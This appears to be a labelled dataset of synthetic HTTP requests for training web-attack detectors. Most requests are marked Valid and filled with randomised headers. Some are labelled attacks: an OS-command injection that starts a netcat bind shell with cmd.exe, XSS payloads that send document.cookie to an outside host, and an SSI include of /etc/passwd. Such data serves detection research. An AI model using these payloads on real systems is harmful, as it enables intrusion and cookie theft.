From: ueasrS@d1jogree.it
If-Modified-Since: Sun, 07 Jan 07 05:35:51 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: *
If-Range: ".cVulEasZLCbaDOpF"
Max-Forwards: 72
MIME-Version: 3.5
Pragma: nepl='dNa'
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic ZXNwZXRmOnNldGUxb2Jv
Range: -827060,69-,229-399617
Referer: http://niax.de/yente/zmEaob/0rhln5g/sGotDiot/refi.jpg
TE: trailers,chunked;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/9.9 (Windows; U; Win98 1.6; ej-zR; rv:2.3.4) Gecko/18642717
UA-CPU: 68000
UA-Disp: 6722,405,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 932x777
Via: FTP/0.4 243.52.213.208, ewo/8.5 www.aosetyt.html
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 151.1.251.143
X-Serial-Number: 126620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47324
Start - Id: 20545
class: Valid
GET /iDWEDKkhOG/pckoMjX5kkkXOh0lu/t4ssylldssneeNe/sHJO/t_YSuKO/s1scxvE7n/oeIemdneaftrhtoti/14a7Ln/a3trqny/sw5ad4nB/cfo1kVZ0G2T-HPD/eeaq.php?etoaeehegsnNa=h.0l&epyf=-tnla&atns0v5E7lxi7d=u-ema&oiloinfti6otth=3768579986&dae=Fe%5Cnoechouh%2F%5Be%2Bgen4%2Feo&lstc2=c&d4aSe7rsid5nt=bmbetween&bdrtfsxt=ajQYqb3xdt&wdanknaxEii3Nv=unioni%3E5l HTTP/1.1
Host: www.nVeaegs.org
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=64
Client-ip: 69.8.127.35
Cookie: oebpeoeieutsw=TjtoatcgdE
Cookie2: $Version="2"
Date: Sat, 08 Jan 05 11:16:57 UTC
ETag: "A8KyYtMgg7z.ePImxV1"
Expect: 100-continue
From: llze@qe9mdhdeb.cz
If-Modified-Since: Thu, 06 Sep 07 05:19:51 GMT
If-Unmodified-Since: Sun, 17 Sep 06 14:01:02 CET
If-Match: *
If-None-Match: "SCzzi0jhYVrThPd6"
If-Range: Sat, 27 Jan 07 02:08:01 CET
Max-Forwards: 368
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM b2VidHBvYXRlaHlodDB3OHJzcjNwb250d0VjaGFSR3hudGdlaGllck9vbjlhdw==
Authorization: Digest algorithm=MD5-sess
Range: 877-
Referer: http://www.yorl.ch/ucas9nui/ieasr/Njxh/2Ou7amnu/reeObae.asmx
TE: chunked;q=0.2,gzip;q=0.1,chunked
Trailer: If-None-Match
User-Agent: Mozilla/7.5 (Windows; U; Win98 1.6; lg-cl; rv:6.2.2) Gecko/86144420
UA-CPU: x86
UA-Disp: 9823,4223,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2533x094
Via: oeaeeA/5.1 139.83.37.201, 8.0 15.111.233.203, 1.7 www.7itsn.jpeg:0
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 151 146.124.39.49:89 "lAPnn" "Sat, 02 Jul 05 07:47:23 GMT"
X-Forwarded-For: 206.2.157.2
X-Serial-Number: 07667933891936164
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20545
Start - Id: 42872
class: OsCommanding
GET /sKqw5Bu3MJe.Nb/owmgmstAetA/sd2ae/cBsiBFaMmM/nmmOJOqfvnO/hq52ntXwab24d.SW/echoWi2ZEMJ046GVY/gg5V0WtTu5/tYNp@opZY.o/ineery6eEetorsntyt.asp?rs=%7C++++shell%28+%22cmd+++++%2Fc+c%3AInetpubwwwrootMSISSnc.exe+++-l+-p+++++6872+++++-t+++++-e+++cmd.exe+++++%22+%29++++%7C++++%27 HTTP/1.0
Host: 177.14.210.80
Connection: erenrta
Accept: video/mpeg, text/*;q=0.6, audio/basic
Accept-Charset: euc-cn, x-mac-japanese, gb2312, iso-8859-2;q=0.1, windows-1255;q=0.5
Accept-Encoding: 
Accept-Language: 0i-i185mo;q=0.3, aTe-lcA, mlresr-snogdd, trzs-rau8us, itEu-rmeoau
Cache-Control: n=oqreesep
Client-ip: 254.89.206.17
Cookie: ims8koeis8enb=le XoShee<rsnIa;buTdlj6rr=hR;bwj=qcDe5Z;MMFfZ2haWCK=)accepti;gainremms=eaedte;s|9w9
Cookie2: $Version="35"
Date: Sun, 26 Nov 06 17:30:25 CET
ETag: W/"DFX@tZVgvg@-RMrr"
Expect: 100-continue
From: rltnk@9tih3Enaa.uk
If-Modified-Since: Sun, 24 Jun 07 09:36:06 UTC
If-Unmodified-Since: Sat, 25 Jul 09 17:24:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 74
MIME-Version: 8.9
Pragma: Rsui=ehiSotr
Proxy-Authorization: Basic YXNmZDp0bW84dHo=
Authorization: Digest algorithm=MD5
Range: 13304-49529,1062-,-1
Referer: /oele/arauo.asp
TE: trailers,gzip;q=0.5
Trailer: Via
User-Agent: ocASXO http://www.dlaaahh.fr
UA-CPU: x86
UA-Disp: 0286,0560,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 625x3364
Via: ite/8.5 www.Iaanokt.gif:80, 2.2 248.89.3.55
Transfer-Encoding: gzip
Upgrade: gveGs/4.5, yshrh/3.9, mYo/3.1
Warning: 811 www.dnso3aq.tiff "segDiei" 
X-Forwarded-For: 67.174.254.77
X-Serial-Number: 646833
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 42872
Start - Id: 46624
class: XSS
GET /rT6rurshit2ofxAusthe/yl4ne/HKaiqXTg0Er/rOg2tct9t9/lGSbgsoundR_VrpbodyT/nsR02eUyeeeAiuuuayd/oorijnArucRtThloit9h/sf.dPc/1Aith5cettos/nirBsuj/rLQ3/oapAuyltueGE-Z.swf?n6QdYOnc1=p%3Blo7en%5C%28nYey&x3YDC-2ToeY=viaIh5oTrft&smnldg=p&dfi7vditsiDrehe=3hN3MFPqnCC4&3Xiok8v-yMZ=zRye%404MpWo_p&fMtrgsav=rorgia&nas0rsf12Tted=ii&8g8Jnullk=ei&TO-DSSyvy=noNn&nhxswyaeageor=djF7FUKK&@4Jw3pGYU7=%5BxeP%26de HTTP/1.1
Host: www.vn3nM.fr:9971
Connection: Emmzreu
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.5, cp-950;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 160.17.79.235
Cookie: ewt7ur3erhtr=1;osWFeadibabredn=s;5unxs=O;uCegg=m;2ES3vR@=kts
Cookie2: $Version="691"
Date: Sun, 22 Feb 04 16:27:07 GMT
ETag: W/"Sh4v0LOFPRUKRUrK"
Expect: 100-continue
From: ibrMts@nvsrs.biz
If-Modified-Since: Fri, 09 Apr 10 06:09:39 UTC
If-Unmodified-Since: Sun, 15 Jun 08 05:36:47 UTC
If-Match: "PT5tqgrvLe.wvGb"
If-None-Match: *
If-Range: Tue, 05 Dec 06 20:58:08 CET
Max-Forwards: 30
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic UXREZTplY2NuaA==
Authorization: Basic c3BybDpQM1N5cg==
Range: -20,2043-844473
Referer: http://aeatdL.cz/iacdL/aEfg3.js
TE: trailers
Trailer: Accept-Encoding
User-Agent: <xml   id    ="  X   "   ><a><b    >&lt;script >[document.location.replace   ('http://www.alnd.com/cgi-bin/lerasttoic.cgi'+document.cookie);]&lt;/script    >;</b ></a    ></xml    >
UA-CPU: 68000
UA-Disp: 905,409,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 950x529
Via: 7.9 96.49.87.39:74
Transfer-Encoding: gzip
Upgrade: sid9/2.5, yer/8.1, dWttre/6.2, Ehs0tt/1.4
Warning: 749 169.197.175.54 "aTaul8Deeyii" "Wed, 21 Apr 04 19:11:25 GMT"
X-Forwarded-For: 151.204.29.132
X-Serial-Number: 205630072672
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46624
Start - Id: 10534
class: Valid
GET /edhd/oeet53haineiNheotu.htm?vnl=994547554&eabyeAhao=beggh7ieorwn&lxx7loa=sterze&bseemliuo=6qxFDS6dq&VvLV=82568881&xa=8&bwaFeGhpa=4rliseRmoe&nilsiahnBrt=%5D%28tiPacopyoT&7TnqvjP2=y8 HTTP/1.0
Host: www.o0eE1eeA.biz
Connection: close
Accept: text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 0-tm;q=0.9, rabel-odoanhe, aenejrr-n, fiG-nhetcp;q=0.9, v6haqoio-ndriumne
Cache-Control: max-stale=75
Client-ip: 167.183.169.101
Cookie: ado1=1;tcwideSuiti3n=hcd't;tqdtaa=ndnseaetee~0m;REPlRpf=bHk.40aZtqT;th=trml5ataIqnrllwn;mej=09
Cookie2: $Version="412"
Date: Sun, 04 Nov 07 22:11:40 CET
ETag: W/"XM8TVP_5vfxZ0MSwv"
Expect: 100-continue
From: oteu@5ieOnnk.biz
If-Modified-Since: Mon, 25 Jan 10 08:59:55 CET
If-Unmodified-Since: Thu, 09 Feb 06 04:48:21 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Aug 07 14:31:30 UTC
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM ZXJlcG5lcWZ3ZW9UeXNhbjNVanl0Z2FucHBpYnNpYWlkZ2puZWJwb2Job1RtZg==
Range: -8188
Referer: http://www.eLln.it/ydip.msf
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (compatible; Konqueror/4.4; Mac OS X; bilep; eamao)
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4657x757
Via: 7.4 www.ehlEr.shtml:109
Transfer-Encoding: deflate
Upgrade: Nf5rt/6.5, ioEY0/5.3, 30O/5.0, Taonn/0.0, rrsr8/6.3
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 67839839
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10534
Start - Id: 3053
class: Valid
GET /nPegsimmhkbkthiEsM/yRC.y0IklpDr/ncpg/eqFaDthmTqjCculk/n0fNR-.html?RdDzX3@=1104&sc3oeae9IwHen=txl4uughboot.inie+h%7C&lt8eshtprT0s=nd&IshrlerRubxfs=ivurugutsA&n10btpP=aD%40&lelopeEt=%25r%5C&URdTKhttpEnetcatPv=epasswdmobjecttgtSe%3E&xsncLbodyXnf5Z=0146 HTTP/1.0
Host: www.trrt.de
Connection: close
Accept: audio/*;q=0.6, application/rtf
Accept-Charset: euc-kr;q=0.1, iso-8859-3;q=0.1, x-mac-roman;q=0.8, x-mac-turkish;q=0.7, windows-1258
Accept-Encoding: identity;q=0.3, identity, deflate;q=0.2, compress
Accept-Language: ixeg-vat7D4es;q=0.1, e8e3r-rsev6f2, h-m3Ba;q=0.8
Cache-Control: gtiekOe=x9A
Client-ip: 198.112.74.209
Cookie: ermiu=7008;rsStdyeCcemHoB=cAeeos6tagsena7oz;h5etsandkoi4dt=886;shitk9sqi=5630937
Cookie2: $Version="178"
Date: Wed, 09 Nov 05 05:58:24 CET
ETag: "crMP5i9mU1Pqg93G"
Expect: yepnctt
From: clms@lki1al.be
If-Modified-Since: Wed, 12 May 04 04:35:29 GMT
If-Unmodified-Since: Fri, 01 Feb 08 18:30:37 UTC
If-Match: "K96YD0eh7JzTLhDQMrXE"
If-None-Match: *
If-Range: "n2BTa_WVW.xPip5oP8W"
Max-Forwards: 9047
MIME-Version: 6.8
Pragma: iorj='rx5rtn'
Proxy-Authorization: In9tm esfisSbg=dzra31hx
Authorization: Basic bjhpZUt0OmF1ZXlk
Range: -723116,-970,848683-
Referer: http://www.qyRgn.de/othql7ge/sCnci/rrRbrfe/shnaoyu1.jpg
TE: deflate;q=0.2,gzip;q=0.1
Trailer: Trailer
User-Agent: Mozilla/3.5 (Windows; U; Win98 2.0; pR-dL; rv:9.2.3) Gecko/96072920
UA-CPU: PowerPC
UA-Disp: 3168,424,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3313x7933
Via: ifxBm/1.8 www.telht.js:24179
Transfer-Encoding: deflate
Upgrade: Oso/1.6, n77i/2.9, maoeo/6.3, 6lx/0.3, nnpy/1.7
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 79351042472156559
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 3053
Start - Id: 31980
class: Valid
GET /jfimtkon/i@y3@9JI.jpeg?soree=2sdttOHnppndw&beoeew=potZaoccT7ve&iPfnUsyei=b%3Enw14t9tz7+&iuaohyaayf2ea5=80352575&hWnoplawn=8083&oasnn1fnsnej=28723 HTTP/1.0
Host: 231.20.237.5
Connection: ucsnsau
Accept: audio/basic, text/plain
Accept-Charset: windows-874, cp-950;q=0.8, x-mac-korean
Accept-Encoding: 
Accept-Language: lzuigrr-derXct;q=0.5, Euseeh-flrrd, leiRtni-sa, hbo-eeidh;q=0.1, snl8-tddhal
Cache-Control: only-if-cached
Client-ip: 171.242.102.144
Cookie: 3jevalf1=de;.jEogPn=nfehsrcSFt;mtGrnu3=dMfVMRLe6_7o;8oksmagr3htBi=s8cDV72cyLou;7eaus=tZ351R;m0passthruJ77QFonT=i0
Cookie2: $Version="0"
Date: Sat, 19 Jul 08 22:17:29 UTC
ETag: "o1-dl6MOW4epB5gfy"
Expect: v0amr0o9
From: aiotemos@ar4lgiownn.be
If-Modified-Since: Sun, 23 Aug 09 16:03:32 GMT
If-Unmodified-Since: Mon, 07 May 07 18:03:19 CET
If-Match: "FG@c9WREAju2cSGYukW"
If-None-Match: "Vja4lT2gZl_byVHhL8Z"
If-Range: *
Max-Forwards: 067
MIME-Version: 0.5
Pragma: t='r'
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: Basic cG9lRGU6b2xmbFRwZWk=
Range: -7
Referer: /om1hu/ult63da/pmuopIs0/iedr.swf
TE: gzip,chunked,gzip;q=0.6
Trailer: Date
User-Agent: qonaooomtedbplin3s
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3694x8259
Via: 4.8 210.59.145.43, FTP/9.3 www.n9ogi.jpg:81776
Transfer-Encoding: deflate
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 811726
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 31980
Start - Id: 2826
class: Valid
GET /ey.CdfnFVuTBWG/yv7_u6ZQ0h9Jldj9/ca0tVyjx-W.png?l9ebait=92017616&id2XE4CF_nodek=q3&GoRe=daitSUan&t2e7enkhfn=%7E4utotr&axoidboa8ilctiu=mnI-gbDsUe&1o0d=servicess%3Frh HTTP/1.0
Host: 39.55.227.10:2877
Connection: b2rywE
Accept: image/png;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: rehNtre-sT0i;q=0.9, Bue9yNnS-8eaa5;q=0.1, e-uqr, antsode4-T;q=0.6, tdox6-zhl;q=0.8
Cache-Control: max-age=5
Client-ip: 128.156.51.190
Cookie: 8tSey=AeGymnq2;6YNinsert=a3yKi6q.cX;eatCroaiteTny=848861
Cookie2: $Version="3"
Date: Mon, 13 Nov 06 07:56:53 CET
ETag: "hcNaxx7E@Au@DR0w"
Expect: Nxkt
From: amctiaa@rubrn.net
If-Modified-Since: Sun, 05 Oct 08 11:20:59 GMT
If-Unmodified-Since: Mon, 04 May 09 01:47:47 UTC
If-Match: "GQIGhKoPCWpmC.-7bJ0"
If-None-Match: "39LPGeKLoHwKIp_bq8v"
If-Range: Thu, 03 Sep 09 05:04:15 CET
Max-Forwards: 030
MIME-Version: 8.2
Pragma: tiieiel=enerus
Proxy-Authorization: NTLM cDY5TWl5bUtub0RudGVhdE9lcmVOZVNpcndsc3FucHZybGMxeWUxd2R3dGhpa2lw
Authorization: ieeEEo ys0u=pGrhi
Range: -648
Referer: /tuolqn/e5nt.asmx
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: mIB2o@yc2Z http://www.noits.org
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: 6.6 192.92.16.249, 0.2 www.ruurcpt.png:93, 7.7 193.70.170.142
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 156.90.175.110
X-Serial-Number: 8694580923107
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2826
Start - Id: 4273
class: Valid
POST /x3icGinclude/h_Uzg1VDWN_/apfvNF@4/scriptVpjvbscriptI/Sspdtrcefocsrarztd/fNBJ6-3mrx-56..0SLpa/oAdFZS1x_S69ulHrTv-.js? HTTP/1.1
Content-Length: 57
Content-Language: eee6hicw,zuoats,satateb
Content-Encoding: gzip
Content-Location: http://uuleedEa.de/rEp6f.txt
Content-MD5: YmlzV29zaTRuZXR1c29lZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Mar 09 23:12:56 UTC
Last-Modified: Wed, 28 Jan 04 16:26:11 CET
Host: 30.128.39.213
Connection: keep-alive
Accept: video/*, image/*, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: htrdnlsg-6, tg-sieiblmq;q=0.7, in5oU-nnhesi4;q=0.0, sbaavsik-a
Cache-Control: only-if-cached
Client-ip: 247.55.250.216
Cookie: eqo2GOGm7=uoTnoAhuEamvatst9i;fHceh=48911
Cookie2: $Version="5"
Date: Mon, 05 Jan 04 02:09:14 UTC
ETag: "sI4Zj5ZrXbshbjjV7e"
Expect: 100-continue
From: exh6@9eehdnqs.de
If-Modified-Since: Thu, 20 Dec 07 12:46:57 CET
If-Unmodified-Since: Thu, 18 Feb 10 13:29:42 CET
If-Match: "cX7UgjauUYnJ5qC0l6"
If-None-Match: "EcevlJneaWCyMwbV22"
If-Range: "2L3FBvPbOZRFRkhFnGd"
Max-Forwards: 6
MIME-Version: 0.2
Pragma: hrautCtn='ahbb'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: NTLM ZTRhYXRlc2tvdW40cHVhNXRCZmhtenRldGFhaWFnd2xudGFtYXV5Mnlob255aXM=
Range: 557-
Referer: http://mi4p.cz/ej3h6ig.mpeg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: yOihndgg6o
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5153x5817
Via: FTP/1.2 www.iaux5E.jpg, 4.4 www.tlEhtwa.tiff
Transfer-Encoding: aqon
Upgrade: Unh/4.4
Warning: 529 www.eedpOe9e.css "dilAc6" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 62285156998436291420
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wsi=594035958&dtfhlrA3dnYtz=497737&s7ieaNaithttHo=uowaan8

End - Id: 4273
Start - Id: 39749
class: SSI
GET /cFXJ9yfLy/s@pFfNjRIba2e4IK/weugile7iPnpo/aifedwrdazlothk/cvei8ttne4nWr8pOir6.cfm?va4rmm=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22--%3E HTTP/1.1
Host: 155.234.192.74
Connection: close
Accept: application/*;q=0.6
Accept-Charset: windows-1252;q=0.1, iso-8859-3, iso-8859-6, x-mac-japanese
Accept-Encoding: deflate, deflate;q=0.2, identity
Accept-Language: *;q=0.4
Cache-Control: max-age=430
Client-ip: 165.148.247.80
Cookie: t1a3hhu1nEata=ic;youmrnitt=hddzeez;mlezid=tm\;l3rrm5onsni0iE=eQy-pRHp.
Cookie2: $Version="7"
Date: Thu, 17 Mar 05 05:36:43 CET
ETag: W/"kJbc9fupXLm3CC3oW."
Expect: 7atT=ybaN
From: n4tbla@ol8e.st
If-Modified-Since: Wed, 10 Sep 08 20:36:41 GMT
If-Unmodified-Since: Fri, 31 Dec 04 10:08:36 CET
If-Match: "hdKwoB-gsr5C2jZDq"
If-None-Match: "Sxgz__kQ-nNDn4X6yIs"
If-Range: Mon, 03 Jul 06 13:28:37 CET
Max-Forwards: 70
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: reaDt emvtgetu=inssramo
Range: -8768,74-87
Referer: http://hypA.cz/rse1D3/nV8ra/ysw6muab.zip
TE: trailers
Trailer: Date
User-Agent: tqesfo (1b1FGj; tidH@1P; gpmAgGUm)
UA-CPU: 68000
UA-Disp: 377,8023,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8113x0333
Via: 6.4 224.169.35.54
Transfer-Encoding: enoEso
Upgrade: 2to/5.7, h7i/2.7, ufnrto/8.8, fpto/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 141.175.190.115
X-Serial-Number: 37299896
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39749
Start - Id: 47979
class: XSS
GET /Een/yhtaccesYbv_TMgVOJ0/oad6cghtmihnl/uTsZDZ3k3m6/eFC0--hedHl/diboa7E.php3?e3s0ii=-randean&ckh=s7ltntnn&op3sxlhatinico=192256149&smfhenoo=pyevssirh&notfsteead=%3Cimg++++dynsrc++%3D%22javascript%3A+%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.naengetr.com%2Fcgi-bin%2Fel.cgi%27%2Bdocument.cookie%29%3B%5D++++%22++%3E HTTP/1.0
Host: 88.217.129.79
Connection: xv6S
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tjddn-9ig2;q=0.8
Cache-Control: no-store
Client-ip: 235.206.209.30
Cookie: B40Un3FH3=3Nnli;qlnn=eneo
Cookie2: $Version="0"
Date: Fri, 05 May 06 10:04:54 CET
ETag: W/".PIa5x900H8gqvCc"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 14 May 04 10:06:30 UTC
If-Unmodified-Since: Mon, 05 Jun 06 03:54:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 986
MIME-Version: 8.2
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: perh hrio=Emhlie
Range: -4,8-
Referer: /oi5Gcht5.conf
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/6.8 (compatible; MSIE 1.8; Open BSD i386; eieimsxth)
UA-CPU: MIPS
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 2.3 103.174.71.166
Transfer-Encoding: gzip
Upgrade: j4z/6.4, aetn/7.6, nyot4w/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47979
Start - Id: 26894
class: Valid
GET /aEzz2/nt_P3T9vev/uceg0hrt8T/ir/Qk.asmx?okeieesN=sock_streamps&rBOBs@=6&ieeetc=e HTTP/1.0
Host: www.yni7a.ch
Connection: close
Accept: video/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity;q=0.3, identity, identity;q=0.7, compress
Accept-Language: be-H95m, t9nAegal-rlir1t;q=0.8, k-ggehDenr;q=0.4, bwr7ieit-rdoh6a;q=0.0
Cache-Control: only-if-cached
Client-ip: 242.251.25.226
Cookie: Xuyj4YjS1=45;e4eye=tlcfartt4uFni6E;egl2tl=connectk giT=;iesdrh=ktpNLi
Cookie2: $Version="22"
Date: Fri, 16 Jun 06 24:04:44 GMT
ETag: W/"n3wtu9Zffju0BFJ"
Expect: 100-continue
From: clW7Lgm@txs4tae.gov
If-Modified-Since: Mon, 13 Dec 04 18:50:18 CET
If-Unmodified-Since: Tue, 04 Aug 09 18:00:20 UTC
If-Match: "@4TwTOKUbxAzhId4"
If-None-Match: *
If-Range: "2zD0WppHeD0v._PW.R-"
Max-Forwards: 1
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: r2458w gcrmd3=dsee
Authorization: Basic bmFlb205OnNhdHRzbg==
Range: 70837-,02-
Referer: http://1Aqdyej0.uk/mwwtqn.swf
TE: gzip;q=0.3,trailers,trailers
Trailer: Via
User-Agent: nnrtrc/1.1
UA-CPU: Sparc
UA-Disp: 0594,3975,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0290x1154
Via: FTP/2.2 www.X52ee.shtml
Transfer-Encoding: gzip
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 320 www.tOi09.js:5 "prd3penwai4ynadT0" 
X-Forwarded-For: 202.36.161.97
X-Serial-Number: 06520
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26894
Start - Id: 12885
class: Valid
GET /rmC1.js?hEnNrrndiscsdpn=aessdtammeiezeejsh&rrhs5wet=xerOo&9t9crx5=eJcxGPoU9zD&qae=0278&dNos7dx9nouwg=y%28&ermkahnIysTal=ytoeyeamtoautoexec&zcy4EwnHEwm=85Tiye3link+5chaas&don=ttma6ScuaItah6osa&5avtnto1rCi=26&eUraw19o5pOD=%28i&rSil2feejHrpNsT=n456 HTTP/1.0
Host: 239.183.146.38:80
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: windows-874;q=0.9
Accept-Encoding: gzip;q=0.0, identity
Accept-Language: qmf-obhk, mj-e;q=0.9, aytus-eaifeuAS;q=0.0, gaevn-S
Cache-Control: kfibeno='ltfid'
Client-ip: 138.179.154.230
Cookie: eax8zSi8x=a ;nwHi=no?o;Xa19tscrlrlgb=tinputnQritt;eeouths=:an
Cookie2: $Version="53"
Date: Sat, 20 Oct 07 23:52:41 CET
ETag: "AbE2PL0XG@2pJRa"
Expect: 100-continue
From: ngeagi8r@t1t7.com
If-Modified-Since: Fri, 18 Nov 05 06:03:27 CET
If-Unmodified-Since: Thu, 04 Aug 05 19:41:41 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 May 04 23:46:01 CET
Max-Forwards: 5
MIME-Version: 5.7
Pragma: a=Etjve1n
Proxy-Authorization: NTLM bmZlY2dlYWVldG9vZXR0SGxob2VPaHRWZXN1YTVlNDl0ZWh1MXJzbWlud2Fy
Authorization: NTLM dGVwZXpyc2h0NmJ0ZHlodGwzdGxlRGh0c2VkY3NpaXRSbDZoZG50YmxlcGlP
Range: 35161-,-2,70941-
Referer: http://www.stoE.ch/kalfjfgu/PolTxe/aamta/saeaH/ttul.asp
TE: gzip,trailers
Trailer: TE
User-Agent: etOot (gPzYBDlMWk; sMdx.hitZ; tpdhQ25; nKCqZVCR.y; aQS9ty6)
UA-CPU: StrongARM
UA-Disp: 737,0051,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 535x377
Via: wsAae/8.2 61.32.167.111, HTTP/8.4 219.166.137.130
Transfer-Encoding: gzip
Upgrade: fwtrra/5.7
Warning: 657 108.119.89.134 "n3Eimiaj3lnutimDg" 
X-Forwarded-For: 91.199.65.166
X-Serial-Number: 4907746729509688
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12885
Start - Id: 13718
class: Valid
GET /3g/0PZlNauUYhkUP/nodeMc/iTut/4BHzcM.gif?rguse9j=9tu&ti=49893&sladives2cbn39=8e&0hseu=lg%3EdhtlishtaccessamN HTTP/1.1
Host: 93.106.90.248
Connection: onzDiR20
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: etXt-eAzewa;q=0.9, ddrcneu-enaGlb8c;q=0.4, enbqtna-hrete3;q=0.6, na6le-sa;q=0.3
Cache-Control: no-transform
Client-ip: 57.9.202.114
Cookie: tte=baorird;1taprp0naZuihl=likeeJtn4m0nln;ehbg2yt=gtf;rKsinialmhs3arf=248;hphFFeqli=da0d oI bcdlogngrnNndy
Cookie2: $Version="4"
Date: Thu, 29 Oct 09 15:02:10 GMT
ETag: W/"FRk2YkzjS03@-de5p"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Tue, 14 Sep 04 04:46:13 GMT
If-Unmodified-Since: Thu, 08 Sep 05 20:23:14 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Sep 06 05:04:24 GMT
Max-Forwards: 97
MIME-Version: 4.2
Pragma: Dho=thng3c4
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
